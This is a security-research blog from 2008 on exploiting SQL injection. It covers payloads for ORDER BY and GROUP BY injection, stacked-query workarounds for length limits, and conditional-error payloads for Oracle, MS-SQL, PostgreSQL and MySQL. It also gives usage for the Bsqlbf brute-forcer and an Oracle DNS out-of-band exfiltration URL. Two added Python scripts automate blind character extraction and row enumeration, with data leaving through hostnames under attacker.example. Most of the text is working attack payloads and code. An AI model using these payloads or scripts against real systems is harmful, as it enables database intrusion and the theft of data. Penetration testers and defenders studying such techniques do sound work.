Injection in Order by, Group by Clause

August 1, 2008 Research | Comments (0) sid @ 2:11 pm

Exploiting SQL injection when the input lands in the ORDER BY clause is a bit tricky, as a UNION is not permitted after ORDER BY. The following can be used in such a scenario to build a blind (error-based) injection: the CASE returns 1 when the condition is true, and when it is false the ELSE branch evaluates a subquery that returns more than one row, which MySQL rejects with an error:

mysql> select id from news where id =1 order by 1, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables) end)=1;
+------+
| id   |
+------+
|    1 |
+------+
1 row in set (0.00 sec)

----

mysql> select id from news where id =1 order by 1, (select case when (1=2) then 1 else 1*(select table_name from information_schema.tables) end)=1;
ERROR 1242 (21000): Subquery returns more than 1 row

----

For injections where the user's input goes into the GROUP BY clause, UNION queries can be used, although the technique above also works for blind injection:

mysql> select id from news where id =1 group by id union select 2222;
+------+
| id   |
+------+
|    1 |
| 2222 |
+------+
2 rows in set (0.00 sec)

Input Length restriction in SQL Injections

July 23, 2008 Research | Comments (0) sid @ 6:47 pm

Often while exploiting SQL injection one encounters a restriction on the length of the input a vulnerable parameter can take, e.g.

  • http://myhost/vuln.asp?vuln=a' union all select 1,2,3,4,5,6,@@version-- works
  • http://myhost/vuln.asp?vuln=a' union all select 1,2,3,4,5,6,table_name from information_schema.tables-- may not work (too long)

One solution is to stage the data in a table with short names and read it back with a short UNION. This needs stacked queries (available here on MS-SQL) and a database login that may create and alter tables:-

  • http://myhost/vuln.asp?vuln=a';select * into xx from information_schema.tables--
  • http://myhost/vuln.asp?vuln=a';exec sp_rename 'xx.table_name','tn'--
  • http://myhost/vuln.asp?vuln=a'union all select 1,2,3,4,5,6,tn from xx--

 Thanks Ferruh for the help

Bsqlbf V2, Blind SQL Injection Brute Forcer

June 21, 2008 Tools for Web App Testing, Research | Comments (1) sid @ 9:28 am

Bsqlbf was originally written by A. Ramos from www.514.es to exploit blind SQL injection against a MySQL backend database. This is a modified version of the same tool. It supports blind SQL injection against the following databases:-

  • MS-SQL
  • MySQL
  • PostgreSQL
  • Oracle

It supports injection in string and integer fields. The feature that sets it apart from other SQL injection tools is that a custom SQL query can be supplied with the -sql switch.

It supports two modes of attack (-type):

Type 0: blind SQL injection based on a true/false response

Type 1: blind SQL injection based on a true/error response

Usage: $./bsqlbf-v2.pl -url http://192.168.1.1/injection_string_post/1.asp?p=1 -method post -match true -database 0 -sql "select top 1 name from sysobjects where xtype='U'"

Download: http://bsqlbf-v2.googlecode.com/files/bsqlbf-v2.1.zip

Send your feedback/suggestions to sid-at-notsosecure(dot)com

If Query Data Manipulation

May 26, 2008 Research | Comments (0) sid @ 7:28 pm

Occasionally when exploiting SQL injection the application does not show different pages for the true and false results of the query. If the database server does not resolve host names (ruling out out-of-band attacks), the usual way to exploit such conditions is a function such as 'waitfor delay', which makes the database sleep for a specified number of seconds. A true condition then returns the output with a delay, whereas a false condition results in a prompt response.

In some cases the application returns different output (or an error page) when the SQL query fails at run time. In these conditions, instead of carrying out a time-based attack, one can use IF/CASE statements to make the query fail depending on the condition.

The following queries tur a condition into a divide-by-zero error. The Oracle query and the first MS-SQL query fail when the condition is true; the CASE forms that put 1/0 (or a multi-row subquery) in the ELSE branch fail when the condition is false:-

Oracle:-

select case when user='SYS' then 1/0 else (select 1 from dual) end from dual

MS-SQL :-

if ((select user) = 'sa' OR (select user) = 'dbo') select 1/0 else select 1

update:- select case when (1=1) then 1 else 1/0 end

POSTGRES :-

SELECT CASE WHEN (1=2) THEN 1 ELSE 1/0 END;

Careful: the PostgreSQL planner folds constant subexpressions, so an ELSE 1/0 is normally evaluated at planning time and fails regardless of a non-constant WHEN condition (a literal 1=2 or 1=1 is folded away before that happens, which is why the query above behaves). A multi-row subquery is not folded, so the following fails only when the condition is false, with 'more than one row returned by a subquery used as an expression':

update:- (case when (1=1) then 1 else (1 * (select 1 from information_schema.tables)) end)=1

MY-SQL:-

1/0 doesn't work: MySQL returns NULL for a division by zero in a SELECT instead of raising an error. Careful, there is an IF query handling denial of service which kills the database in old versions.

update:- (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables) end)=1

returns ERROR 1242 'Subquery returns more than 1 row' when the condition is false (see the Order by post above).

----

Thanks pentestmonkey for providing some useful queries 

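The ORDER BY technique at the top of the page and the conditional-error queries in this post are the same oracle seen from two angles: a true condition returns the normal page, a false one makes the query fail. The following is an added example, not code from the original posts, showing that oracle driving character-by-character extraction. SQLite stands in for MySQL (information_schema.tables becomes sqlite_master, and the multi-row subquery becomes an oversized zeroblob(), since SQLite silently takes the first row of a scalar subquery); the news/users tables, the column names and the binary search over printable ASCII are assumptions of the example:

```python
import sqlite3

# Added example, not the original posts' code. SQLite stands in for the MySQL
# backend; the table names and the error trigger are constructed for the demo.

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE news (id INTEGER, title TEXT);"
        "INSERT INTO news VALUES (1, 'first'), (2, 'second');"
        "CREATE TABLE users (name TEXT, pw TEXT);"
    )
    return conn

def news_ids(conn, injected):
    """The vulnerable query: the user's input lands after ORDER BY 1, as in the post."""
    sql = "SELECT id FROM news WHERE id = 1 ORDER BY 1, " + injected
    return [row[0] for row in conn.execute(sql)]

def news_ids_grouped(conn, injected):
    """Same application, input landing in GROUP BY instead: a UNION is allowed here."""
    sql = "SELECT id FROM news WHERE id = 1 GROUP BY " + injected
    return [row[0] for row in conn.execute(sql)]

def union_after_order_by_rejected(conn):
    """A UNION appended after ORDER BY is refused at parse time."""
    try:
        news_ids(conn, "1 UNION SELECT 2222")
        return False
    except sqlite3.OperationalError:
        return True

# The post's CASE: true -> harmless value, false -> the ELSE branch raises.
# MySQL raises on the multi-row subquery; SQLite silently takes its first row,
# so an oversized zeroblob() is the error trigger here. It references a column
# on purpose: a constant ELSE could be evaluated eagerly (SQLite hoists constant
# function calls out of the row loop, much as the PostgreSQL planner folds 1/0).
ERROR_IF_FALSE = "(CASE WHEN ({cond}) THEN 1 ELSE zeroblob(length(title) * 2000000000) END)"

def condition_holds(conn, cond):
    """The oracle: True if the page comes back, False if the query errored out."""
    try:
        news_ids(conn, ERROR_IF_FALSE.format(cond=cond))
        return True
    except sqlite3.Error:
        return False

def blind_extract(conn, expr, max_len=64):
    """Recover the text value of the SQL expression `expr` using only the oracle:
    one existence probe per position, then a binary search over printable ASCII
    (about eight requests per character instead of one per candidate)."""
    out = ""
    for pos in range(1, max_len + 1):
        if not condition_holds(conn, "length({e}) >= {p}".format(e=expr, p=pos)):
            return out                      # past the end of the string
        lo, hi = 32, 126                    # the code point lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            probe = "unicode(substr({e}, {p}, 1)) > {m}".format(e=expr, p=pos, m=mid)
            if condition_holds(conn, probe):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out

# What information_schema.tables is to MySQL, sqlite_master is to SQLite.
FIRST_TABLE = "(SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name LIMIT 1)"

if __name__ == "__main__":
    db = make_db()
    print("UNION after ORDER BY rejected:", union_after_order_by_rejected(db))
    print("GROUP BY then UNION:", news_ids_grouped(db, "id UNION SELECT 2222"))
    print("true ->", condition_holds(db, "1=1"), " false ->", condition_holds(db, "1=2"))
    print("first table name:", blind_extract(db, FIRST_TABLE))
```

Swapping `condition_holds` for an HTTP request that checks for the error page (bsqlbf's -type 1) turns this into the real attack; the extraction loop does not change.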

Getting Past the Comma(,) in Oracle SQL Injection

May 24, 2008 Research | Comments (0) sid @ 8:38 am

Recently I came across a SQL injection against an Oracle database, where the vulnerable parameter took comma-separated input.

A valid input thus looked like:- index.do?id=1,200

It was easy to confirm that it was vulnerable to SQL injection by producing true and false responses:-

True response:- index.do?id=1,200 and 1=1

False Response:- index.do?id=1,200 and 1=2

This way I could carry out blind SQL injection, but then I tried to get data through out-of-band channeling, and that worked too:-

example:- index.php?id=1,200+and(SELECT+UTL_INADDR.get_host_address((SELECT+user+from+dual)||'.a.notsosecure.com')+FROM+dual)+is+not+null

However, the problem arrived when I had to get data by iterating through rows. To iterate through rows I normally use the following syntax:-

SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9;

But as this application was taking comma-separated values, the comma caused my query to be split and restructured, and the application returned an error.

A solution is to select the Nth row without a comma, by taking the first row that is not among the first N-1 rows:-

index.php?id=1,200+and(SELECT+UTL_INADDR.get_host_address((SELECT+column_name+from+all_tab_columns+where+rownum<2+and+column_name+not+in+(select+column_name+from+all_tab_columns+where+rownum<4))||'.a.notsosecure.com')+FROM+dual)+is+not+null

By increasing the rownum value of the inner query (rownum<4 above) iteration can be achieved. However, as this number increases the backend queries become more and more CPU intensive. I still could not do a UNION SELECT query, as the original query selects more than one column and I could not figure out a way to do a UNION SELECT without entering a comma.
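As an added example (not the post's queries), here is the comma-free row iteration above, reconstructed against a simulated endpoint that splits its parameter on commas before building the query. SQLite stands in for Oracle: sqlite_master for all_tab_columns, LIMIT n for rownum<n+1, and a registered get_host_address() function, which logs its argument the way the attacker's name server would see the lookup, for UTL_INADDR.GET_HOST_ADDRESS. The endpoint's query, the table names and the attacker.example domain are assumptions of the example:

```python
import sqlite3

# Added example, not the post's queries. SQLite stands in for Oracle, and the
# endpoint, its schema and the exfiltration domain are constructed for the demo.

class Resolver:
    """Stand-in for the attacker-controlled DNS server: every name the database
    tries to resolve is recorded, and the data rides in the leftmost label."""
    def __init__(self):
        self.seen = []

    def lookup(self, host):
        self.seen.append(host)
        return "127.0.0.1"   # the answer is irrelevant; the question is the channel

def make_db(resolver):
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE news (id INTEGER, status INTEGER, title TEXT);"
        "INSERT INTO news VALUES (1, 200, 'hello');"
        "CREATE TABLE accounts (u TEXT);"
        "CREATE TABLE orders (n INTEGER);"
        "CREATE TABLE tokens (t TEXT);"
    )
    # SQLite has no UTL_INADDR; a registered function plays that role here.
    conn.create_function("get_host_address", 1, resolver.lookup)
    return conn

def app(conn, param):
    """Reconstructed endpoint: it splits the comma-separated parameter before
    building the query, so any comma inside a payload lands in the wrong slot."""
    parts = param.split(",")
    if len(parts) != 2:
        raise ValueError("expected id,status")
    sql = "SELECT title FROM news WHERE id = %s AND status = %s" % tuple(parts)
    return [r[0] for r in conn.execute(sql)]

# The usual row iterator needs "ROWNUM r, username": one comma too many.
NAIVE = "1,200 AND (SELECT r FROM (SELECT ROWNUM r, username FROM all_users) WHERE r = 9) IS NOT NULL"

def nth_table(n):
    """Comma-free selection of row n (0-based): the first row that is not among
    the first n rows. The inner query is re-run on every request, so the cost
    grows with n, which is the CPU caveat in the post."""
    tables = "sqlite_master WHERE type = 'table'"
    return ("(SELECT name FROM {t} AND name NOT IN "
            "(SELECT name FROM {t} ORDER BY name LIMIT {n}) ORDER BY name LIMIT 1)"
            ).format(t=tables, n=n)

def exfil_payload(n):
    """Row n leaves through the hostname <name>.a.attacker.example (constructed)."""
    return ("1,200 AND (SELECT get_host_address({row} || '.a.attacker.example')) "
            "IS NOT NULL").format(row=nth_table(n))

def naive_payload_breaks(conn):
    """The comma in the ROWNUM form gets split off before the SQL is even built."""
    try:
        app(conn, NAIVE)
        return False
    except ValueError:
        return True

def enumerate_tables(conn, resolver, max_rows=50):
    """Walk the rows by bumping n until NOT IN has excluded everything."""
    names = []
    for n in range(max_rows):
        app(conn, exfil_payload(n))         # the HTTP response itself is irrelevant
        host = resolver.seen[-1]
        if host is None:                    # NULL || '...' is NULL: no more rows
            break
        names.append(host.split(".")[0])
    return names

if __name__ == "__main__":
    res = Resolver()
    db = make_db(res)
    print("naive payload breaks:", naive_payload_breaks(db))
    print("row 3 selector:", nth_table(3))
    print("tables seen at the resolver:", enumerate_tables(db, res))
```

Against Oracle the selector is the rownum form from the post and the lookup goes through UTL_INADDR, but the loop is the same: bump n, watch the name server, stop when the label comes back empty.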

----
A good resource for pentesting the Oracle Application Server can be found here:-

Oracle Application Scanner (OAPscan) is also a very handy tool.